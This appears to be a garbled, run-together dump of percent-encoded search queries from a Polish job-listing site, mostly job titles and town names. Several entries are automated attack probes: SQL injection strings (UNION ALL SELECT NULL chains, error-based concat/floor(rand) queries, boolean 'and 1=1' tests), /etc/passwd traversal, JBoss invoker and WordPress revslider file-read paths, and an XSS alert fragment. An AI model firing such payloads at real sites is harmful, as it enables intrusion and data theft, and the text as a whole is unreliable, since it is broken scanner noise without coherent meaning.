stażze%2b%25252525c5%252525259brednim%2bwykszta%25252525c5%2525252582ceniemit+sta%25c5%25bcw%2bj%c4%99zyku%2bukrai%c5%84skiminformatyka programowanie wrocławagencja pracy transfanderopiekunka+do+os%25c3%25b3b+starszych+w+niemczech+bez+j%25c4%2599zykasprzeda%2525c5%2525bc+%25257c+obs%2525c5%252582uga+klienta szczecinasystent/ka+ds.+administracji+i+obs%c3%85%c2%82ugi+klientamonter%2bpod%2525c5%252582%2525c3%2525b3gpraca fizyczna w rolnictwie szwajcariapracownik+do+sortowania+owoc%2525252525c3%2525252525b3w holandiakontrola+jako%c5%9bci polskaasystent/ka ds. administracji i obsługi klientapracownik myjni samochodowej %252525252528m/k%252525252529specjalista+ds.+planowania+jako%2525c5%25259bci+%252528m/k%252529kierownik+w+dpslesznoit Łódźpraca%2525252bz%2525252bzakwaterowaniemin%25c5%25bcynier budowy warszawakierowca c%252bemechanik+przemysłowy/+monterkierowca kat b c1111111111111' union select char(45,120,49,45,81,45)--praca+wieczorami warszawanauczyciel+j%25c4%2599zyk+niemiecki/login.action/invoker/jmxinvokerservletkierowca%252bw%252bwypo%25252525c5%25252525bcyczalni%252bsamochodowej%252b%2525252528m/k%252praca%25252bfizyczna%25252bspawacz niemcypraca dorywcza tomaszów mazowieckienergetyka %257c elektronika warszawasprzedaż+|+obsługa+klienta Świdnicapracownik+porządkowykontroler jakości (m/k) Świdnicaochrona+środowiskasprzedaż kwiatówprzemys%25252525c5%2525252582+%252525257c+produkcja pomorskiereferent ds kadrpraca dla ucznia wakacje krakówdoradca ds. sprzeda%c5%bcy samochod%c3%b3w nowych'a=0doradca klienta z językiem niemieckim warszawapraca dla emeryta, sepracownik+dzia%25252525c5%2525252582u+administracjimechanika+i+budowa+maszynkierowca+w%c3%b3zka+wid%c5%82owegokierowca w wypo%252525252525c5%252525252525bcyczalni samochodowej %25252525252528m%2fk%25252525252529 niemcypracownik%2bporz%c4%85dkowykalisznauczyciel język niemiecki/login.action/invoker/jmxinvokerservletkierowca++kat+c'+union+all+select+null,null--+xkdaprzedstawiciel handlowy krakówspecjalista ds. mazowieckieŚroda Śląskapraca+z+zakwaterowaniem%2525d0%2525b2%2525d0%2525be%2525d0%2525b4%2525d0%2525b8%2525d1%252582%2525d0%2525b5%2525d0%2525bb%2525d1%25258c %2525d0%2525ba%pracownik%2badministracjibudownictwo %252525257c geodezjaspecjalista%252bprp%25c5%2582atnos ci warszawakierowca%252bbes%252bznajosci%252bjenzykalogistyka+|+dystrybucjaaaaaaaaakierowca++kat+c%25%27+union+all+select+null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull--+kcgwchociwelkierowca+c warszawaasystent poznańkierowca cysterna polskaoperator+sprzetu+budowlanego katowice/lider w dziale art. przemysłowych zgorzelecparacownik myjni warszawadobiegniewreferent+ds.+administracji+%2528m/k%2529operator w%25c3%25b3zka wid%25c5%2582owego holandianowaopiekunka do os%2525c3%2525b3b starszych w niemczech bez j%2525c4%252599zyka niemcymonter fasadwsparcie sprzeda%25c5%25bcypracownik+do+wykładania+towarumonter konstrukcji/wp-login.php%2527a%253d0/wp-admin/wp-admin/admin-ajax.php%253faction%253drevslider_show_imagespecjalista+ds.+jako%25252525c5%252525259bcim%252525c5%25252582odszy+specjalistakierowca+kurier pomorskieprodukcja lek%c3%b3w warszawaprogramista+cnckierowca kat c%27 union all select null%2cnull%2cnull%2cnull%2cnull%2cnull-- gkmesupply+chain+management polandtester gier komputerowychśroda+śląska/etc/passwd%25%27 union all select null%2cnull%2cnull%2cnull%2cnull%2cnull-- fmbvwarszawa,asystent/ka+ds.+administracji+i+obs%2525c5%252582ugi+klienta warszawadla obcokrajowc%25c3%25b3wkierowca+w%2525c3%2525b3zka+wid%2525c5%252582owegoasystent/ka ds. administracji i obs%2525c5%252582ugi klientasprzataczka w szkole poznańpraca+w+muzeumpraca transport krakówdoradca+klienta+z+j%c4%99zykiem+niemieckimkontrola%2bjako%c5%9bci mazowieckieinżynier+jakości+w+dziale+projektów wrocławkarlinomechanik przemys%2525c5%252582owy%25252f monterredaktor+treści+psychologicznychnauczyciel języka niemieckiego wrocławoperator koparki %c5%82adowarkipraca+fizyczna pabianicepracownik%2bprodukcji%2b%2525252528m/k%2525252529kluczborkmedia+%7c+sztuka+%7c+rozrywka%27a%3d0kierowca%2b%2bkat%2bc%25%27%2border%2bby%2b1--%2brvrioperator w%c3%b3zka wid%c5%82owego %28m/k%29pracownik%252bmonta%25c3%2585%25c2%25bcupracownik produkcji %252525252528m/k%252525252529specjalista%2bdshrinternet+%257c+e-commerce%27a%3d0sprzeda%25c5%25bc+%257c+obs%25c5%2582uga+klienta/bran%25c5%25bca+elektrotechniczn%25c4%2585sprzataczka w szkole" and "x"="xpakowacz+bez+j%2525c4%252599zykaprodukcja dla niepełnosprawnych union all select null,null,null,null,null,null,null,null,null#operator+w%2525c3%2525b3zka+wid%2525c5%252582owego niemcypomoc do pakowaniapracownik+do+sortowania+owoc%2525c3%2525b3w holandiakędzierzyn-koźletransport %2525257c spedycja%252522 and %252522x%252522%25253d%252522ybudownictwo%25252525252b%25252525257c%25252525252bgeodezjawarehouse/wp-login.php%27a%3d0%27a%3d0' tychy'technik+farmacji poznańlider w dziale produkt%2525252525c3%2525252525b3w du%2525252525c5%2525252525bcej konsumpcjimagazynowy (m/k) lublinsekretarka+ze+znajomo%c5%9bci%c4%85'a=0konsultant j%25c4%2599zyk angielski mazowieckie/etc/passwd%25%27 union all select null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull-- xstvoperator maszyn - praca tylko w weekendypracownik produkcjii wielkopolskiepracownik produkcji wałbrzychpracownik powierzchni sprzedaży/kasjer tomaszów mazowieckido%2bkioskusprzedaż+|+obsługa+klienta szczecinpracownik%2bksi%25c4%2599gowo%25c5%259bcipracownik+produkcji+-+praca+w+godz.+7-15logistyka%2b%25257c%2bdystrybucjaaaaaaaaakierowca%252bkat%252bbnowogardoperator wózka widłowego (m/k)Świdnikprodukcja+dla++niepełnosprawnych+1/2+etatu poznańoperator+w%c3%b3zk%c3%b3w+wid%c5%82owychwarehouse/wp-login.php%27a%3d0%27a%3d0'+and+'x'='xpraca%2bfizycznz niemcybez%2520do%2525c5%25259bwiadczenia niemcypół+etatu warszawanowogród+bobrzański(select 8101 from(select count(*),concat(0x7170627871,(select (elt(8101=8101,1))),0x717a786a71,floor(rand(0)*2))x from informatimalarz szpachlarz niemcyoperator%2bw%252525252525c3%252525252525b3zk%252525252525c3%252525252525b3w%2bwid%252525252525c5%25252525252582owychkey account manager (m/k)'a=0monter konstrukcji/wp-login.php%2527a%253d0/07545460.php%2522 or %25281%252c2%2529%253d%2528select%252afrom%2528select name_conskierowca+w+wypo%c5%bcyczalni+samochodowej+%28m/k%29 warszawagrafika+%257c+fotografia+%257c+kreacjaprodukcja+dla++niepełnosprawnych'+union+all+select+null,null,concat(0x7170627871,0x7147744e465853694a78,0x717a786a71)#technik informatykkierowca c%25252be lub c1elektryk%2b%28m/k%29energetyka+%25257c+elektronika warszawapraca%2bfizyczna%2bsprz%25c4%2585taczka sosnowiecstarachowicemonter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0 and 1=1<bodyonload=alert('mysqle